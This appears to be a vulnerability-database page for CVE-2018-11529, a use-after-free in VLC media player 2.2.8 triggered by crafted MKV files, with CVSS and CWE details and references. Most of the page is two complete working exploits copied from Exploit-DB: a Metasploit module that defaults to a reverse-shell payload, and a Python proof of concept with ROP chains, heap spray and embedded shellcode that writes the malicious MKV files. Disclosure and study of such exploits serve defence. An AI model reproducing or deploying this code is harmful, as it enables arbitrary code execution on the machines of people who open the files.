CVE-2018-11529 : Detail

CVE-2018-11529

8
/
High
Memory Corruption
85.12%V3
Adjacent
2018-07-11
14h00 +00:00
2018-10-18
07h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

VideoLAN VLC media player 2.2.x is prone to a use after free vulnerability which an attacker can leverage to execute arbitrary code via crafted MKV files. Failed exploit attempts will likely result in denial of service conditions.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-416 Use After Free
The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 8 HIGH CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Adjacent

A vulnerability exploitable with adjacent network access means the vulnerable component is bound to the network stack, however the attack is limited to the same shared physical (e.g. Bluetooth, IEEE 802.11), or logical (e.g. local IP subnet) network, and cannot be performed across an OSI layer 3 boundary (e.g. a router).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

nvd@nist.gov
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 45626

Publication date : 2018-10-15 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit Rank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VLC Media Player MKV Use After Free', 'Description' => %q( This module exploits a use after free vulnerability in VideoLAN VLC =< 2.2.8. The vulnerability exists in the parsing of MKV files and affects both 32 bits and 64 bits. In order to exploit this, this module will generate two files: The first .mkv file contains the main vulnerability and heap spray, the second .mkv file is required in order to take the vulnerable code path and should be placed under the same directory as the .mkv file. This module has been tested against VLC v2.2.8. Tested with payloads windows/exec, windows/x64/exec, windows/shell/reverse_tcp, windows/x64/shell/reverse_tcp. Meterpreter payloads if used can cause the application to crash instead. ), 'License' => MSF_LICENSE, 'Author' => [ 'Eugene Ng - GovTech', # Vulnerability Discovery, Exploit 'Winston Ho - GovTech', # Metasploit Module ], 'References' => [ ['CVE', '2018-11529'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11529'], ['EDB', '44979'] ], 'Payload' => { 'Space' => 0x300, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'VLC 2.2.8 on Windows 10 x86', { 'Platform' => 'win', 'Arch' => [ARCH_X86], 'Ret' => 0x22000020, 'ExitPointer' => 0x00411364, 'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}, 'RopChain' => [ 0x0040ae91, # XCHG EAX,ESP # ADD BYTE PTR [ECX],AL # MOV EAX,DWORD PTR [EAX] # RET 0x00407086, # POP EDI # RETN [vlc.exe] 0x00000040, # 0x00000040-> edx 0x0040b058, # MOV EDX,EDI # POP ESI # POP EDI # POP EBP # RETN [vlc.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x004039c7, # POP EAX # POP ECX # RETN [vlc.exe] 0x22000030, # Filler (compensate) for rol [eax] below 0x41414141, # Filler (compensate) 0x004039c8, # POP ECX # RETN [vlc.exe] 0x0041193d, # &Writable location [vlc.exe] 0x00409d18, # POP EBX # RETN [vlc.exe] 0x00000201, # 0x00000201-> ebx 0x0040a623, # POP EBP # RETN [vlc.exe] 0x0040a623, # POP EBP # RETN [vlc.exe] 0x004036CB, # POP ESI # RETN [vlc.exe] 0x0040848c, # JMP ds:[EAX * 4 + 40e000] [vlc.exe] 0x00407086, # POP EDI # RETN [vlc.exe] 0x0040ae95, # MOV EAX,DWORD PTR [EAX] # RETN [vlc.exe] 0x0040af61, # PUSHAD # ROL BYTE PTR [EAX], 0FFH # LOOPNE VLC+0XAEF8 (0040AEF8) 0x22000020 + 0x5e0, # Shellcode ] } ], [ 'VLC 2.2.8 on Windows 10 x64', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'Ret' => 0x40000040, 'ExitPointer' => 0x00412680, 'DefaultOptions' => {'PAYLOAD' => 'windows/x64/shell/reverse_tcp'}, 'RopChain' => [ 0x004037ac, # XCHG EAX,ESP # ROL BL,90H # CMP WORD PTR [RCX],5A4DH # JE VLC+0X37C0 (00000000`004037C0) # XOR EAX,EAX # RET 0x00403b60, # POP RCX # RET 0x40000040, # lpAddress 0x004011c2, # POP RDX # RET 0x00001000, # dwSize 0x0040ab70, # JMP VirtualProtect 0x40000040 + 0x700, # Payload ] } ] ], 'Privileged' => false, 'DisclosureDate' => 'May 24 2018', 'DefaultTarget' => 1)) register_options [ OptString.new('MKV_ONE', [false, 'mkv that should be opened', '']), OptString.new('MKV_TWO', [false, 'The auxiliary file name.', '']) ] deregister_options('FILENAME') end def to_bytes(num, length, endianess = 'big') h = format('%<num>x', num: num) s = ('0' * (h.length % 2) + h).rjust(length * 2) s = s.scan(/.{2}/).map! { |x| x.hex.chr }.join endianess == 'big' ? s : s.reverse end def data_size(number, numbytes = (1...9)) # encode 'number' as an EBML variable-size integer. numbytes = [numbytes] if numbytes.is_a?(Integer) numbytes.each do |size| bits = size * 7 return to_bytes(((1 << bits) + number), size) if number <= (1 << bits) - 2 end fail_with(Failure::BadConfig, "Can't store #{number} in #{size} bytes") end def build_data(size) block_size = 0x1000 if target.arch.first == ARCH_X64 target_address_packed = [target.ret].pack("<Q") rop_chain = target['RopChain'].map { |qword| [qword].pack("<Q") }.join if size == 0x180 uaf_object = "\x41" * size uaf_object[0x30, 8] = target_address_packed uaf_object[0x38, 8] = [target.ret + 0x10000].pack("<Q") uaf_object[0x168, 8] = [target.ret + 0x3c0].pack("<Q") uaf_object[0x170, 8] = target_address_packed return uaf_object else block = "\x00" * block_size block[0x0, 4] = "\x41" * 4 block[0x8, target_address_packed.length] = target_address_packed block[0x10, target_address_packed.length] = target_address_packed block[0x40, 8] = [0x1].pack("<Q") block[0x58, 8] = [target.ret + 0x3a8].pack("<Q") block[0xE4, 8] = [0x1].pack("<Q") block[0x1b8, 8] = [target.ret + 0x80].pack("<Q") block[0x3b8, rop_chain.length] = rop_chain block[0x6d8, 8] = [target.ret + 0x10].pack("<Q") block[0x700, payload.encoded.length] = payload.encoded block *= size / block.length + 1 end return block[0, size] elsif target.arch.first == ARCH_X86 target_address_packed = [target.ret].pack("<I") rop_chain = target['RopChain'].map { |dword| [dword].pack("<I") }.join if size == 0x100 uaf_object = "\x41" * size uaf_object[0x28, 4] = target_address_packed uaf_object[0x2c, 4] = [target.ret + 0x10000].pack("<I") uaf_object[0xf4, 4] = [target.ret + 0x2bc].pack("<I") uaf_object[0xf8, 4] = target_address_packed return uaf_object else block = "\x00" * block_size block[0x0, 4] = [0x22000040].pack("<I") block[0x4, target_address_packed.length] = target_address_packed block[0x8, target_address_packed.length] = target_address_packed block[0x10, 4] = [0xc85].pack("<I") block[0x30, 4] = [0x1].pack("<I") block[0xc0, 4] = [0x1].pack("<I") block[0x194, 4] = [0x2200031c].pack("<I") block[0x2c0, 4] = [0x220002e4].pack("<I") block[0x2f4, 4] = [0x22000310].pack("<I") block[0x2f8, rop_chain.length] = rop_chain block[0x564, 4] = [0x22000588].pack("<I") block[0x5e0, payload.encoded.length] = payload.encoded block *= size / block.length + 1 end return block[0, size] end end def generate_mkv # EBML Header doc_type = "\x42\x82" << data_size(8) << "matroska" ebml = "\x1a\x45\xdf\xa3" << data_size(doc_type.length) << doc_type # Seek Entries seek_entry = "\x53\xab" << data_size(4) # SeekID seek_entry << "\x15\x49\xa9\x66" # KaxInfo seek_entry << "\x53\xac" << data_size(2) << "\xff" * 2 # SeekPosition + Index of Segment info seek_entries = "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry seek_entry = "\x53\xab" << data_size(4) # SeekID seek_entry << "\x11\x4d\x9b\x74" # KaxSeekHead seek_entry << "\x53\xac" << data_size(4) << "\xff" * 4 # SeekPosition + Index of SeekHead seek_entries << "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry seek_entry = "\x53\xab" << data_size(4) # SeekID seek_entry << "\x10\x43\xa7\x70" # KaxChapters seek_entry << "\x53\xac" << data_size(4) << "\xff" * 4 # SeekPosition + Index of Chapters seek_entries << "\x4d\xbb" << data_size(seek_entry.length) << seek_entry # Seek Entry # SeekHead seek_head = "\x11\x4d\x9b\x74" << data_size(seek_entries.length) << seek_entries # Void void = "\xec" << data_size(2) << "\x41" # Trigger bug with an out-of-order element # Info segment_uid = "\x73\xa4" << data_size(16) << rand_text(16) info = "\x15\x49\xa9\x66" << data_size(segment_uid.length) << segment_uid # Chapters chapter_segment_uid = "\x6e\x67" << data_size(16) << rand_text(16) chapter_atom = "\xb6" << data_size(chapter_segment_uid.length) << chapter_segment_uid edition_entry = "\x45\xb9" << data_size(chapter_atom.length) << chapter_atom chapters = "\x10\x43\xa7\x70" << data_size(edition_entry.length) << edition_entry if target.arch.first == ARCH_X86 size = 0x100 count = 30 elsif target.arch.first == ARCH_X64 size = 0x180 count = 60 end # Attachments attached_files = "" mime = "\x46\x60" << data_size(24) << "application/octet-stream" data = build_data(size) data = "\x46\x5c" << data_size(data.length) << data 500.times do uid = "\x46\xae" << data_size(8) << rand_text(8) file_name = "\x46\x6e" << data_size(8) << rand_text(8) header = "\x61\xa7" << data_size(uid.length + file_name.length + mime.length + data.length) attached_files << header << file_name << mime << uid << data end attachments = "\x19\x41\xa4\x69" << data_size(attached_files.length) << attached_files # Cluster pay_load = build_data(0xfff000) # Since the payload is simply repeated payload blocks appended to cluster then segment_data, # we return the simple_block and the count to process later instead. # This should result is overall lowered memory usage during payload generation simple_block = "\xa3" << data_size(pay_load.length) << pay_load simple_blocks_len = simple_block.length * count time_code = "\xe7" << data_size(1) << "\x00" cluster = "\x1f\x43\xb6\x75" << data_size(time_code.length + simple_blocks_len) << time_code # Concatenate everything segment_data = seek_head << void << info << chapters << attachments << cluster segment = "\x18\x53\x80\x67" << data_size(segment_data.length + simple_blocks_len) << segment_data mkv = ebml << segment return mkv, simple_block, count end def exploit mkv1, simple_block, count = generate_mkv mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10) tmpname = rand_text_alpha_lower(3..8) f1 = datastore['MKV_ONE'].empty? ? "#{tmpname}-part1.mkv" : datastore['MKV_ONE'] f1 << '.mkv' unless f1.downcase.end_with?('.mkv') f2 = datastore['MKV_TWO'].empty? ? "#{tmpname}-part2.mkv" : datastore['MKV_TWO'] f2 << '.mkv' unless f2.downcase.end_with?('.mkv') file_format_filename(f1) file_create(mkv1) print_status("Created #{f1}. Target should open this file") file_format_filename(f2) file_create(mkv2) print_status("Created #{f2}. Put this file in the same directory as #{f1}") print_status("Appending blocks to #{f1}") path = File.join(Msf::Config.local_directory, f1) full_path = ::File.expand_path(path) File.open(full_path, 'ab') do |fd| count.times { fd.write(simple_block) } end print_good("Succesfully appended blocks to #{f1}") end def file_format_filename(name = '') name.empty? ? @fname : @fname = name end end
Exploit Database EDB-ID : 44979

Publication date : 2018-07-04 22h00 +00:00
Author : Eugene Ng
EDB Verified : No

# Exploit Title: VLC media player 2.2.8 - Arbitrary Code Execution PoC # Date: 2018-06-06 # Exploit Author: Eugene Ng # Vendor Homepage: https://www.videolan.org/vlc/index.html # Software Link: http://download.videolan.org/pub/videolan/vlc/2.2.8/win64/vlc-2.2.8-win64.exe # Version: 2.2.8 # Tested on: Windows 10 x64 # CVE: CVE-2018-11529 # # 1. Description # # VLC media player through 2.2.8 is prone to a Use-After-Free (UAF) vulnerability. This issue allows # an attacker to execute arbitrary code in the context of the logged-in user via crafted MKV files. Failed # exploit attempts will likely result in denial of service conditions. # # Exploit can work on both 32 bits and 64 bits of VLC media player. # # 2. Proof of Concept # # Generate MKV files using python # Open VLC media player # Drag and drop poc.mkv into VLC media player (more reliable than double clicking) # # 3. Solution # # Update to version 3.0.3 # https://get.videolan.org/vlc/3.0.3/win64/vlc-3.0.3-win64.exe import uuid from struct import pack class AttachedFile(object): def __init__(self, data): self.uid = '\x46\xae' + data_size(8) + uuid.uuid4().bytes[:8] self.name = '\x46\x6e' + data_size(8) + uuid.uuid4().bytes[:8] self.mime = '\x46\x60' + data_size(24) + 'application/octet-stream' self.data = '\x46\x5c' + data_size(len(data)) + data self.header = '\x61\xa7' + data_size(len(self.name) + len(self.data) + len(self.mime) + len(self.uid)) def __str__(self): return self.header + self.name + self.mime + self.uid + self.data def to_bytes(n, length): h = '%x' % n s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex') return s def data_size(number, numbytes=range(1, 9)): # encode 'number' as an EBML variable-size integer. size = 0 for size in numbytes: bits = size*7 if number <= (1 << bits) - 2: return to_bytes(((1 << bits) + number), size) raise ValueError("Can't store {} in {} bytes".format(number, size)) def build_data(size, bits, version): target_addresses = { '64': 0x40000040, '32': 0x22000020, } target_address = target_addresses[bits] exit_pointers = { '64': { '2.2.8': 0x00412680, }, '32': { '2.2.8': 0x00411364, } } pExit = exit_pointers[bits][version] rop_gadgets = { '64': { '2.2.8': [ 0x004037ac, # XCHG EAX,ESP # ROL BL,90H # CMP WORD PTR [RCX],5A4DH # JE VLC+0X37C0 # XOR EAX,EAX # RET 0x00403b60, # POP RCX # RET target_address, # lpAddress 0x004011c2, # POP RDX # RET 0x00001000, # dwSize 0x0040ab70, # JMP VirtualProtect target_address + 0x500, # Shellcode ], }, '32': { '2.2.8': [ 0x0040ae91, # XCHG EAX,ESP # ADD BYTE PTR [ECX],AL # MOV EAX,DWORD PTR [EAX] # RET 0x00407086, # POP EDI # RETN [vlc.exe] 0x00000040, # 0x00000040-> edx 0x0040b058, # MOV EDX,EDI # POP ESI # POP EDI # POP EBP # RETN [vlc.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x004039c7, # POP EAX # POP ECX # RETN [vlc.exe] 0x22000030, # Filler (compensate) for rol [eax] below 0x41414141, # Filler (compensate) 0x004039c8, # POP ECX # RETN [vlc.exe] 0x0041193d, # &Writable location [vlc.exe] 0x00409d18, # POP EBX # RETN [vlc.exe] 0x00000201, # 0x00000201-> ebx 0x0040a623, # POP EBP # RETN [vlc.exe] 0x0040a623, # POP EBP # RETN [vlc.exe] 0x004036CB, # POP ESI # RETN [vlc.exe] 0x0040848c, # JMP ds:[EAX * 4 + 40e000] [vlc.exe] 0x00407086, # POP EDI # RETN [vlc.exe] 0x0040ae95, # MOV EAX,DWORD PTR [EAX] # RETN [vlc.exe] 0x0040af61, # PUSHAD # ROL BYTE PTR [EAX], 0FFH # LOOPNE VLC+0XAEF8 (0040AEF8) target_address + 0x5e0, # Shellcode ], } } if bits == '64': target_address_packed = pack("<Q", target_addresses[bits]) rop_chain = ''.join(pack('<Q', _) for _ in rop_gadgets[bits][version]) # https://github.com/peterferrie/win-exec-calc-shellcode/tree/master/build/bin # w64-exec-calc-shellcode-esp.bin shellcode = ( "\x66\x83\xe4\xf0\x50\x6a\x60\x5a\x68\x63\x61\x6c\x63\x54\x59\x48" "\x29\xd4\x65\x48\x8b\x32\x48\x8b\x76\x18\x48\x8b\x76\x10\x48\xad" "\x48\x8b\x30\x48\x8b\x7e\x30\x03\x57\x3c\x8b\x5c\x17\x28\x8b\x74" "\x1f\x20\x48\x01\xfe\x8b\x54\x1f\x24\x0f\xb7\x2c\x17\x8d\x52\x02" "\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xef\x8b\x74\x1f\x1c\x48\x01" "\xfe\x8b\x34\xae\x48\x01\xf7\x99\xff\xd7" # add shellcode to avoid crashes by terminating the process # xor rcx, rcx # mov rax, pExit # call [rax] "\x48\x31\xc9\x48\xc7\xc0" + pack("<I", pExit) + "\xff\x10") if size == 0x180: UAF_object = '\x41' while len(UAF_object) < size: UAF_object += UAF_object UAF_object = UAF_object[:size] UAF_object = UAF_object[:0x30] + target_address_packed + UAF_object[0x38:] UAF_object = UAF_object[:0x38] + pack("<Q", target_address + 0x10000) + UAF_object[0x40:] UAF_object = UAF_object[:0x168] + pack("<Q", target_address + 0x3c0) + UAF_object[0x170:] UAF_object = UAF_object[:0x170] + target_address_packed + UAF_object[0x178:] return UAF_object else: block = '\x00' block_size = 0x1000 while len(block) < block_size: block += block block = block[:block_size] block = block[:0x0] + '\x41' * 4 + block[0x4:] block = block[:0x8] + target_address_packed + block[0x10:] block = block[:0x10] + target_address_packed + block[0x18:] block = block[:0x40] + pack("<Q", 0x1) + block[0x48:] block = block[:0x58] + pack("<Q", target_address + 0x3a8) + block[0x60:] block = block[:0xE4] + pack("<Q", 0x1) + block[0xEC:] block = block[:0x1b8] + pack("<Q", target_address + 0x80) + block[0x1c0:] block = block[:0x3b8] + rop_chain + block[0x3b8+len(rop_chain):] block = block[:0x500] + shellcode + block[0x500 + len(shellcode):] block = block[:0x6d8] + pack("<Q", target_address + 0x10) + block[0x6e0:] while len(block) < size: block += block return block[:size] else: target_address_packed = pack("<I", target_addresses[bits]) rop_chain = ''.join(pack('<I', _) for _ in rop_gadgets[bits][version]) # https://github.com/peterferrie/win-exec-calc-shellcode/tree/master/build/bin # w32-exec-calc-shellcode.bin shellcode = ( "\x83\xE4\xFC\x31\xD2\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64" "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B" "\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24" "\x0F\xB7\x2C\x17\x42\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0" "\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7" # add shellcode to avoid crashes by terminating the process # xor eax, eax # push eax # mov eax, pExit # jmp eax "\x31\xC0\x50\xA1" + pack("<I", pExit) + "\xff\xe0") if size == 0x100: UAF_object = '\x41' while len(UAF_object) < size: UAF_object += UAF_object UAF_object = UAF_object[:size] UAF_object = UAF_object[:0x28] + target_address_packed + UAF_object[0x2c:] UAF_object = UAF_object[:0x2c] + pack("<I", target_address + 0x10000) + UAF_object[0x30:] UAF_object = UAF_object[:0xf4] + pack("<I", target_address + 0x2bc) + UAF_object[0xf8:] UAF_object = UAF_object[:0xf8] + target_address_packed + UAF_object[0xfc:] return UAF_object else: block = '\x00' block_size = 0x1000 while len(block) < block_size: block += block block = block[:block_size] block = block[:0x0] + pack("<I", 0x22000040) + block[0x4:] block = block[:0x4] + target_address_packed + block[0x8:] block = block[:0x8] + target_address_packed + block[0xc:] block = block[:0x10] + pack("<I", 0xc85) + block[0x14:] block = block[:0x30] + pack("<I", 0x1) + block[0x34:] block = block[:0xc0] + pack("<I", 0x1) + block[0xc4:] block = block[:0x194] + pack("<I", 0x2200031c) + block[0x198:] block = block[:0x2c0] + pack("<I", 0x220002e4) + block[0x2c4:] block = block[:0x2f4] + pack("<I", 0x22000310) + block[0x2f8:] block = block[:0x2f8] + rop_chain + block[0x2f8+len(rop_chain):] block = block[:0x564] + pack("<I", 0x22000588) + block[0x568:] block = block[:0x5e0] + shellcode + block[0x5e0+len(shellcode):] while len(block) < size: block += block return block[:size] def build_exploit(bits, version): # EBML Header DocType = "\x42\x82" + data_size(8) + "matroska" EBML = "\x1a\x45\xdf\xa3" + data_size(len(DocType)) + DocType # Seek Entries SeekEntry = "\x53\xab" + data_size(4) # SeekID SeekEntry += "\x15\x49\xa9\x66" # KaxInfo SeekEntry += "\x53\xac" + data_size(2) + "\xff" * 2 # SeekPosition + Index of Segment info SeekEntries = "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry SeekEntry = "\x53\xab" + data_size(4) # SeekID SeekEntry += "\x11\x4d\x9b\x74" # KaxSeekHead SeekEntry += "\x53\xac" + data_size(4) + "\xff" * 4 # SeekPosition + Index of SeekHead SeekEntries += "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry SeekEntry = "\x53\xab" + data_size(4) # SeekID SeekEntry += "\x10\x43\xa7\x70" # KaxChapters SeekEntry += "\x53\xac" + data_size(4) + "\xff" * 4 # SeekPosition + Index of Chapters SeekEntries += "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry # SeekHead SeekHead = "\x11\x4d\x9b\x74" + data_size(len(SeekEntries)) + SeekEntries # Void Void = "\xec" + data_size(2) + "\x41" # Trigger bug with an out-of-order element # Info SegmentUID = "\x73\xa4" + data_size(16) + uuid.uuid4().bytes Info = "\x15\x49\xa9\x66" + data_size(len(SegmentUID)) + SegmentUID # Chapters ChapterSegmentUID = "\x6e\x67" + data_size(16) + uuid.uuid4().bytes ChapterAtom = "\xb6" + data_size(len(ChapterSegmentUID)) + ChapterSegmentUID EditionEntry = "\x45\xb9" + data_size(len(ChapterAtom)) + ChapterAtom Chapters = "\x10\x43\xa7\x70" + data_size(len(EditionEntry)) + EditionEntry if bits == '64': size = 0x180 count = 60 else: size = 0x100 count = 30 # Attachments print "[+] Generating UAF objects...", AttachedFiles = "" for i in range(500): AttachedFiles += str(AttachedFile(build_data(size, bits, version))) Attachments = "\x19\x41\xa4\x69" + data_size(len(AttachedFiles)) + AttachedFiles print "done" # Cluster print "[+] Generating payload...", payload = build_data(0xfff000, bits, version) SimpleBlocks = "\xa3" + data_size(len(payload)) + payload SimpleBlocksLength = len(SimpleBlocks) * count Timecode = "\xe7" + data_size(1) + "\x00" Cluster = "\x1f\x43\xb6\x75" + data_size(len(Timecode) + SimpleBlocksLength) + Timecode print "done" # Concatenate everything SegmentData = SeekHead + Void + Info + Chapters + Attachments + Cluster Segment = "\x18\x53\x80\x67" + data_size(len(SegmentData) + SimpleBlocksLength) + SegmentData mkv = EBML + Segment print "[+] Writing poc MKV...", with open('poc.mkv', 'wb') as fp: fp.write(mkv) for i in range(count): fp.write(SimpleBlocks) print "done" # Bug requires another MKV file in the same directory, hence we # generate another 'minimally valid' MKV file that VLC will parse # Also able to use any other valid MKV file... auxi_mkv = mkv[:0x4f] + "\x15\x49\xa9\x66" + data_size(10) # Add some arbitrary size print "[+] Writing auxiliary MKV...", with open('auxi.mkv', 'wb') as fp: fp.write(auxi_mkv) print "done" if __name__ == '__main__': bits = '64' # 32 / 64 version = '2.2.8' print "Building exploit for %s-bit VLC media player %s on Windows" % (bits, version) build_exploit(bits, version) print "Open VLC and drag and drop in poc.mkv"

Products Mentioned

Configuraton 0

Debian>>Debian_linux >> Version 9.0

Configuraton 0

Videolan>>Vlc_media_player >> Version To (including) 2.2.8

References

http://www.securitytracker.com/id/1041311
Tags : vdb-entry, x_refsource_SECTRACK
http://seclists.org/fulldisclosure/2018/Jul/28
Tags : mailing-list, x_refsource_FULLDISC
https://www.exploit-db.com/exploits/45626/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.debian.org/security/2018/dsa-4251
Tags : vendor-advisory, x_refsource_DEBIAN